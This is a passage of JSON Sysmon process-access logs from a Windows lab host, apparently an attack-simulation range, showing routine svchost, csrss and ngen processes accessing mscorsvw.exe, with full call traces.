08:05:29.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001099230C00}","TargetProcessId":"3900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7215,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.132\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001071270C00}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.132","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001071270C00}","TargetProcessId":"2252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7216,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.132\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001071270C00}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.132","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001071270C00}","TargetProcessId":"2252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7217,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.132\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001071270C00}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.132","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001071270C00}","TargetProcessId":"2252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7218,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.163\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00101F2B0C00}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.163","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00101F2B0C00}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7219,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.163\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00101F2B0C00}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.163","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00101F2B0C00}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7220,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.179\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010FA8B0C00}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.179","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010FA8B0C00}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7221,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.195\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-00100C8F0C00}\r\nTargetProcessId: 4964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.195","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-00100C8F0C00}","TargetProcessId":"4964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\